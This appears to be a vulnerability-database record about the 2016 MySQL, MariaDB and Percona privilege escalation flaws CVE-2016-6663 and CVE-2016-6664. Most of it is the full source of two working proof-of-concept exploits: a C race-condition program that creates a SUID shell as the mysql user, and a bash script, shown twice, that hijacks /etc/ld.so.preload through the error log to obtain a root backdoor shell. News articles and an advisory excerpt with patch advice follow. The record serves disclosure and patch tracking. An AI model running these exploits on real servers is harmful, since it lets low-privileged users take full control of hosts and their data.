-e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n\r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n\techo -e \"Got it. 
Executing 'killall mysqld' now...\"\r\n\tkillall mysqld\r\nfi\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\trm -f $ERRORLOG\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/\tdir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n\r\n#while :; do \r\n#\tsleep 0.1\r\n#\tps aux | grep mysqld | grep -q 'log-error'\r\n#\tif [ $? -eq 0 ]; then\r\n#\t\tbreak;\r\n#\tfi\r\n#done\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! 
\\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40679/"}], "thn": [{"lastseen": "2018-01-27T09:18:02", "bulletinFamily": "info", "cvelist": ["CVE-2016-6663", "CVE-2016-6664", "CVE-2016-6662"], "description": "[](<https://3.bp.blogspot.com/-rNDG8RTtpzY/WBrtCaHmb7I/AAAAAAAAqEg/1Gzysgot1rgaEN4A8Upj1a8qqtBEUSihACLcB/s1600/mysql-zero-day-exploit-hacking.png>)\n\nOver a month ago we reported about [two critical zero-day vulnerabilities](<https://thehackernews.com/2016/09/hack-mysql-database.html>) in the world's 2nd most popular database management software MySQL: \n\n\n * MySQL Remote Root Code Execution (CVE-2016-6662)\n * Privilege Escalation (CVE-2016-6663)\nAt that time, Polish security researcher **[Dawid Golunski](<https://twitter.com/dawid_golunski>) **of [Legal Hackers](<https://legalhackers.com/>) who discovered these vulnerabilities published technical details and [proof-of-concept exploit code](<https://thehackernews.com/2016/09/hack-mysql-database.html>) for the first bug only and promised to release details of the second bug (CVE-2016-6663) later. \n \nOn Tuesday, Golunski has released proof-of-concept (POC) exploits for two vulnerabilities: \n \nOne is the previously promised critical privilege escalation vulnerability ([CVE-2016-6663](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>)), and another is a new root privilege escalation bug ([CVE-2016-6664](<https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html>)) that could allow an attacker to take full control over the database. 
\n \nBoth the vulnerabilities affect MySQL version 5.5.51 and earlier, MySQL version 5.6.32 and earlier, and MySQL version 5.7.14 and earlier, as well as MySQL forks \u2014 Percona Server and MariaDB. \n \n\n\n### Privilege Escalation/Race Condition Bug (CVE-2016-6663)\n\nThe more severe of the two is the race condition bug (CVE-2016-6663) that can allow a low-privileged account (with CREATE/INSERT/SELECT grants) with access to the affected database to escalate their privileges and execute arbitrary code as the database system user (i.e. 'mysql'). \n \nOnce exploited, an attacker could successfully gain access to all databases within the affected database server. \n \n\n\n### Root Privilege Escalation (CVE-2016-6664)\n\n \nAnother critical flaw in MySQL database is a root privilege escalation bug that could allow attackers with 'MySQL system user' privilege to further escalate their privileges to root user, allowing them to fully compromise the system. \n \nThe issue actually stems from unsafe file handling of error logs and other files, which comes under MySQL system user privileges, allowing it to be replaced with an arbitrary system file, which opens the door to root privileges. \n \nWhat's more troublesome? An attacker with a low-privileged account can also achieve root privilege by first exploiting the Privilege Escalation flaw (CVE-2016-6663) to become 'MySQL system user' and thus allow attackers to fully compromise the targeted server. \n \nAll these vulnerabilities could be exploited in shared hosting environments where users are assigned access to separate databases. By exploiting the flaws, they could gain access to all databases. 
\n \nGolunski has published the proof-of-concept exploit code ([Exploit 1](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>), [Exploit 2](<https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html>)) for both the flaws and will soon [upload videos](<http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html>). \n \nMySQL has fixed the vulnerabilities and all of the patches ultimately found their way into Oracle's quarterly Critical Patch Update last month. \n \nAdministrators are strongly advised to [apply patches](<https://www.mysql.com/downloads/>) as soon as possible in order to avoid hackers seeking to exploit the vulnerabilities. \n \nIf you are unable to immediately apply patches, then as a temporary mitigation you can also disable symbolic link support within your database server configuration to this setting \u2014 **_my.cnf to symbolic-links = 0_** \u2014 in an attempt to protect yourself against cyber attacks.\n", "modified": "2016-11-06T16:44:59", "published": "2016-11-02T21:16:00", "id": "THN:527125445EE758FC7D6A33333D6500EB", "href": "https://thehackernews.com/2016/11/mysql-zero-day-exploits.html", "type": "thn", "title": "Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nMySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - mysql System User Privilege Escalation Race Condition", "edition": 1, "published": "2016-11-01T00:00:00", "title": "MySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - mysql System User Privilege Escalation Race Condition", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-01T00:00:00", "id": 
"EXPLOITPACK:55F22FE44A0D6F3F9005C334804B2317", "href": "", "sourceData": "/*\n\nSource: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c\n\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\nmysql-privesc-race.c (ver. 1.0)\n\nCVE-2016-6663 / OCVE-2016-5616\n\nDiscovered/Coded by:\n\nDawid Golunski\ndawid[at]legalhackers.com\nhttps://legalhackers.com\n\nFollow https://twitter.com/dawid_golunski for updates on this advisory.\n\n\nCompile:\ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient\n\nNote:\n* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads)\n\n* For testing purposes only. Do no harm. \n\nFull advisory URL:\nhttps://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\n\nVideo PoC:\nhttps://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\n\n*/\n\n\n#include <fcntl.h>\n#include <grp.h>\n#include <mysql.h>\n#include <pwd.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/inotify.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <time.h>\n#include <unistd.h>\n\n\n#define EXP_PATH \"/tmp/mysql_privesc_exploit\"\n#define EXP_DIRN \"mysql_privesc_exploit\"\n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\"\n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\"\n\n#define SUID_SHELL \t EXP_PATH \"/mysql_suid_shell.MYD\"\n\n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary\n\nMYSQL *conn;\t\t // DB handles\nMYSQL_RES *res;\nMYSQL_ROW row;\n\nunsigned long cnt;\n\n\nvoid intro() {\n\nprintf( \n \"\\033[94m\\n\"\n \"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\"\n \"mysql-privesc-race.c (ver. 
1.0)\\n\\n\"\n \"CVE-2016-6663 / OCVE-2016-5616\\n\\n\"\n \"For testing purposes only. Do no harm.\\n\\n\"\n\t\"Discovered/Coded by:\\n\\n\"\n\t\"Dawid Golunski \\n\"\n\t\"http://legalhackers.com\"\n \"\\033[0m\\n\\n\");\n\n}\n\nvoid usage(char *argv0) {\n intro();\n printf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0);\n}\n\nvoid mysql_cmd(char *sql_cmd, int silent) {\n \n if (!silent) {\n\t printf(\"%s \\n\", sql_cmd);\n }\n if (mysql_query(conn, sql_cmd)) {\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\n exit(1);\n }\n res = mysql_store_result(conn);\n if (res>0) mysql_free_result(res);\n\n}\n\n\nint main(int argc,char **argv)\n{\n\n int randomnum = 0;\n int io_notified = 0;\n int myd_handle;\n int wpid;\n int is_shell_suid=0;\n pid_t pid;\n int status;\n struct stat st;\n /* io notify */\n int fd;\n int ret;\n char buf[4096] __attribute__((aligned(8)));\n int num_read;\n struct inotify_event *event;\n /* credentials */\n char *user = argv[1];\n char *password = argv[2];\n char *db_host = argv[3];\n char *database = argv[4];\n\n\n // Disable buffering of stdout\n setvbuf(stdout, NULL, _IONBF, 0);\n\n // Get the params\n if (argc!=5) {\n\tusage(argv[0]);\n\texit(1);\n } \n intro();\n // Show initial privileges\n printf(\"\\n[+] Starting the exploit as: \\n\");\n system(\"id\");\n\n // Connect to the database server with provided credentials\n printf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host);\n conn = mysql_init(NULL);\n if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\n exit(1);\n }\n\n // Prepare tmp dir\n printf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN);\n umask(000);\n system(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN);\n system(\"chmod g+s /tmp/\" EXP_DIRN );\n\n // Prepare exploit tables :)\n printf(\"\\n[+] Creating mysql tables \\n\\n\");\n mysql_cmd(\"DROP TABLE IF EXISTS 
exploit_table\", 0);\n mysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0);\n mysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\n mysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\n\n // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file\n // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory\n printf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\");\n system(\"cp /bin/bash \" SUID_SHELL);\n system(\"ls -l \" SUID_SHELL);\n\n // Use inotify to get the timing right\n fd = inotify_init();\n if (fd < 0) {\n printf(\"failed to inotify_init\\n\");\n return -1;\n }\n ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);\n\n\n /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */\n\n printf(\"\\n[+] Entering the race loop... 
Hang in there...\\n\");\n\n while ( is_shell_suid != 1 ) {\n\n cnt++;\n\tif ( (cnt % 100) == 0 ) {\n\t \tprintf(\"->\");\n\t \t//fflush(stdout);\t\n\t}\n\n /* Create empty file , remove if already exists */\n unlink(MYSQL_TEMP_FILE);\n unlink(MYSQL_TAB_FILE);\n \tmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1);\n\tmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1);\n\n\t/* random num if needed */\n srand ( time(NULL) );\n randomnum = ( rand() % MAX_DELAY );\n\n // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink\n pid = fork();\n if (pid < 0) {\n fprintf(stderr, \"Fork failed :(\\n\");\n }\n\n /* Child process - executes REPAIR TABLE SQL statement */\n if (pid == 0) {\n usleep(500);\n unlink(MYSQL_TEMP_FILE);\n\t mysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1);\n // child stops here\n exit(0);\n }\n\n /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */\n if (pid > 0 ) {\n io_notified = 0;\n\n while (1) {\n int processed = 0;\n ret = read(fd, buf, sizeof(buf));\n if (ret < 0) {\n break;\n }\n while (processed < ret) {\n event = (struct inotify_event *)(buf + processed);\n if (event->mask & IN_CLOSE) {\n if (!strcmp(event->name, \"exploit_table.TMD\")) {\n //usleep(randomnum);\n\n\t\t\t // Set the .MYD permissions to suid+exec before they get copied to the .TMD file \n\t\t\t unlink(MYSQL_TAB_FILE);\n\t\t\t myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);\n\t\t\t close(myd_handle);\n\t\t\t chmod(MYSQL_TAB_FILE, 04777);\n\n\t\t\t // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec\n unlink(MYSQL_TEMP_FILE);\n symlink(SUID_SHELL, MYSQL_TEMP_FILE);\n io_notified=1;\n }\n }\n processed += sizeof(struct inotify_event);\n }\n if (io_notified) {\n break;\n }\n }\n\n\n waitpid(pid, &status, 0);\n }\n\n\t// Check if SUID bit was set at the end of this attempt\n if ( lstat(SUID_SHELL, &st) == 
0 ) {\n\t if (st.st_mode & S_ISUID) {\n\t\tis_shell_suid = 1;\n\t }\n } \n\n }\n\n printf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt);\n system(\"ls -l \" SUID_SHELL);\n\n printf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\");\n system(SUID_SHELL \" -p -i \");\n //system(SUID_SHELL \" -p -c '/bin/bash -i -p'\");\n\n /* close MySQL connection and exit */\n printf(\"\\n[+] Job done. Exiting\\n\\n\");\n mysql_close(conn);\n return 0;\n\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:36", "description": "\nMySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - root System User Privilege Escalation", "edition": 1, "published": "2016-11-01T00:00:00", "title": "MySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - root System User Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-01T00:00:00", "id": "EXPLOITPACK:3D8D46697DAADEA8249E37B2A2F09AE3", "href": "", "sourceData": "#!/bin/bash -p\n#\n# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh\n#\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\n# mysql-chowned.sh (ver. 
1.0)\n#\n# CVE-2016-6664 / OCVE-2016-5617\n#\n# Discovered and coded by:\n#\n# Dawid Golunski\n# dawid[at]legalhackers.com\n#\n# https://legalhackers.com\n#\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\n#\n# This PoC exploit allows attackers to (instantly) escalate their privileges\n# from mysql system account to root through unsafe error log handling.\n# The exploit requires that file-based logging has been configured (default).\n# To confirm that syslog logging has not been enabled instead use:\n# grep -r syslog /etc/mysql\n# which should return no results.\n#\n# This exploit can be chained with the following vulnerability:\n# CVE-2016-6663 / OCVE-2016-5616\n# which allows attackers to gain access to mysql system account (mysql shell).\n#\n# In case database server has been configured with syslog you may also use:\n# CVE-2016-6662 as an alternative to this exploit.\n#\n# Usage:\n# ./mysql-chowned.sh path_to_error.log \n#\n#\n# See the full advisory for details at:\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\n#\n# Video PoC:\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\n#\n#\n# Disclaimer:\n# For testing purposes only. Do no harm.\n#\n\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\nSUIDBIN=\"/usr/bin/sudo\"\n\nfunction cleanexit {\n\t# Cleanup \n\techo -e \"\\n[+] Cleaning up...\"\n\trm -f $PRIVESCSRC\n\trm -f $PRIVESCLIB\n\trm -f $ERRORLOG\n\ttouch $ERRORLOG\n\tif [ -f /etc/ld.so.preload ]; then\n\t\techo -n > /etc/ld.so.preload\n\tfi\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\n\texit $1\n}\n\nfunction ctrl_c() {\n echo -e \"\\n[+] Active exploitation aborted. 
Remember you can use -deferred switch for deferred exploitation.\"\n\tcleanexit 0\n}\n\n#intro \necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\n\n# Args\nif [ $# -lt 1 ]; then\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\n\texit 3\nfi\n\n# Priv check\n\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\nid | grep -q mysql \nif [ $? -ne 0 ]; then\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\n\texit 3\nfi\n\n# Set target paths\nERRORLOG=\"$1\"\nif [ ! -f $ERRORLOG ]; then\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\n\texit 3\nfi\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\n\n# [ Active exploitation ]\n\ntrap ctrl_c INT\n# Compile privesc preload library\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\ncat <<_solibeof_>$PRIVESCSRC\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <dlfcn.h>\n #include <sys/types.h>\n #include <sys/stat.h>\n #include <fcntl.h>\n\nuid_t geteuid(void) {\n\tstatic uid_t (*old_geteuid)();\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n\tif ( old_geteuid() == 0 ) {\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\n\t\tchmod(\"$BACKDOORPATH\", 04777);\n\t\t//unlink(\"/etc/ld.so.preload\");\n\t}\n\treturn old_geteuid();\n}\n_solibeof_\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\nif [ $? -ne 0 ]; then\n\techo -e \"\\n[!] 
Failed to compile the privesc lib $PRIVESCSRC.\"\n\tcleanexit 2;\nfi\n\n\n# Prepare backdoor shell\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\n\n# Safety check\nif [ -f /etc/ld.so.preload ]; then\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\n\texit 2\nfi\n\n# Symlink the log file to /etc\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\nif [ $? -ne 0 ]; then\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\n\tcleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\n\n# Wait for MySQL to re-open the logs\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\nif [ \"$THE_ANSWER\" = \"y\" ]; then\n\techo -e \"Got it. Executing 'killall mysqld' now...\"\n\tkillall mysqld\nfi\nwhile :; do \n\tsleep 0.1\n\tif [ -f /etc/ld.so.preload ]; then\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\n\t\trm -f $ERRORLOG\n\t\tbreak;\n\tfi\ndone\n\n# /etc/\tdir should be owned by mysql user at this point\n# Inject the privesc.so shared library to escalate privileges\necho $PRIVESCLIB > /etc/ld.so.preload\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\nchmod 755 /etc/ld.so.preload\n\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\nsudo 2>/dev/null >/dev/null\n\n#while :; do \n#\tsleep 0.1\n#\tps aux | grep mysqld | grep -q 'log-error'\n#\tif [ $? 
-eq 0 ]; then\n#\t\tbreak;\n#\tfi\n#done\n\n# Check for the rootshell\nls -l $BACKDOORPATH\nls -l $BACKDOORPATH | grep rws | grep -q root\nif [ $? -eq 0 ]; then \n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\nelse\n\techo -e \"\\n[!] Failed to get root\"\n\tcleanexit 2\nfi\n\n\n# Execute the rootshell\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\n$BACKDOORPATH -p\n\n# Job done.\ncleanexit 0", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:30", "bulletinFamily": "info", "cvelist": ["CVE-2016-5616", "CVE-2016-5617", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664"], "description": "Critical vulnerabilities in MySQL and vendor deployments by database servers MariaDB and PerconaDB have been identified that can lead to arbitrary code execution, root privilege escalation and server compromise.\n\n[Dawid Golunski](<https://twitter.com/dawid_golunski>) of [Legal Hackers](<https://legalhackers.com>) published details around two proof-of-concept exploits for the vulnerabilities on Tuesday.\n\nBoth vulnerabilities affect MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier, along with MySQL database forks such as Percona Server and MariaDB.\n\nThe first vulnerability, [a privilege escalation/race condition](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>) bug (CVE-2016-6663) is the more severe of the two. It can allow a local system user that has access to a database to escalate their privileges and execute arbitrary code as the database system user, Golunski said in an advisory. 
From there, an attacker could successfully access all of the databases on the affected database server.\n\nMore troubling, an attacker could chain the vulnerability together with a privilege escalation vulnerability, like the one Golunski uncovered in MySQL [back in September](<https://threatpost.com/critical-mysql-vulnerability-disclosed/120486/>), or the second, separate vulnerability he disclosed this week to further escalate privileges to the root system user. After doing so, an attacker could fully compromise the target server.\n\nGolunski warns the vulnerability could be exploited in a shared hosting environment where users are technically assigned to just one database, or by an attacker who could have gained access to a system as a lower tier user.\n\nThe second vulnerability uncovered by Golunski is [a root privilege escalation bug](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>) that can be used in tandem with the race condition bug. Affected is MySQL and all current builds of MariaDB and select builds of Percona Server and Percona XtraDB Cluster.\n\nThe vulnerability is tied to the unsafe file handling of error logs and other files. Assuming an attacker has already gained MySQL system user access through the CVE-2016-6663 exploit they could further escalate their privileges on the system as root user. 
The error.log file is the crux of the problem here; because of the way it is handled, unsafe file operations allow it to be removed and quickly replaced with an arbitrary system file, something that opens the door to root privileges.\n\nAccording to the researcher, combining this bug with the other privilege escalation bug would make things even messier.\n\n\u201cThe combination of the two would effectively allow low privileged local database users to escalate their system privileges to root system account and allow them to fully compromise the server which increases the severity of this issue,\u201d Golunski writes.\n\nGolunski told Threatpost on Wednesday that the vulnerabilities have been fixed by the database management systems for the most part. MySQL and Percona released patches for both issues after he privately disclosed the bugs to them.\n\nMariaDB is the lone holdout, at least for now. The database server project fixed the first bug but has not patched the root privilege escalation vulnerability yet. According to Golunski, based on his interaction with the company, developers there were focused on fixing the Privilege Escalation/Race Condition vulnerability (CVE-2016-6663) first.\n\nWhen reached on Wednesday, a spokesperson from MariaDB said the database would fix CVE-2016-6664 in a future release:\n\n> To clarify, CVE-2016-6664 requires another vulnerability in order to be exploitable. With CVE-2016-6663 fixed, there are no known exploitable vulnerabilities in MariaDB. We are planning to fix CVE-2016-6664 in an upcoming release, MariaDB said.\n\nGolunski first warned about CVE-2016-6663, undisclosed at the time, back in September when he divulged details around another issue, a remote root code execution and privilege escalation vulnerability ([CVE-2016-6662](<https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html>)) in MySQL. 
MySQL ultimately fixed that bug quietly without informing Golunski. All of the fixes ultimately found their way into Oracle\u2019s quarterly Critical Patch Update \u2013 the most recent two coming under different CVE names (CVE-2016-5616, and CVE-2016-5617) \u2013 [last month](<https://threatpost.com/oracle-fixes-253-vulnerabilities-in-last-cpu-of-2016/121375/>).\n\nGolunski, who plans to publish [a video demonstrating](<https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html>) how an attacker could use the proof-of-concept exploit on all three database systems on Wednesday night, is encouraging users to update to the latest version regardless of what they use.\n", "modified": "2016-11-04T15:38:36", "published": "2016-11-02T14:02:10", "id": "THREATPOST:DA4DD61F50F0B749E360DA63CBE651AF", "href": "https://threatpost.com/critical-mysql-vulnerabilities-can-lead-to-server-compromise/121738/", "type": "threatpost", "title": "Critical MySQL Vulnerabilities Can Lead to Server Compromise", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:09", "description": "", "published": "2016-11-02T00:00:00", "type": "packetstorm", "title": "MySQL / MariaDB / PerconaDB Root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-02T00:00:00", "id": "PACKETSTORM:139491", "href": "https://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html", "sourceData": "`============================================= \n- Release date: 01.11.2016 \n- Discovered by: Dawid Golunski \n- Severity: High/Critical \n- CVE-2016-6664 / OCVE-2016-5617 \n- http://legalhackers.com \n============================================= \n \n \nI. 
VULNERABILITY \n------------------------- \n \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nMariaDB \nAll current \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \n \nII. BACKGROUND \n------------------------- \n \nMySQL: \n \n\"MySQL is the world's most popular open source database. \nWhether you are a fast growing web property, technology ISV or large \nenterprise, MySQL can cost-effectively help you deliver high performance, \nscalable database applications.\" \n \n\"Many of the world's largest and fastest-growing organizations including \nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time \nand money powering their high-volume Web sites, business-critical systems and \npackaged software.\" \n \nhttp://www.mysql.com/products/ \nhttp://www.mysql.com/why-mysql/ \n \n-- \n 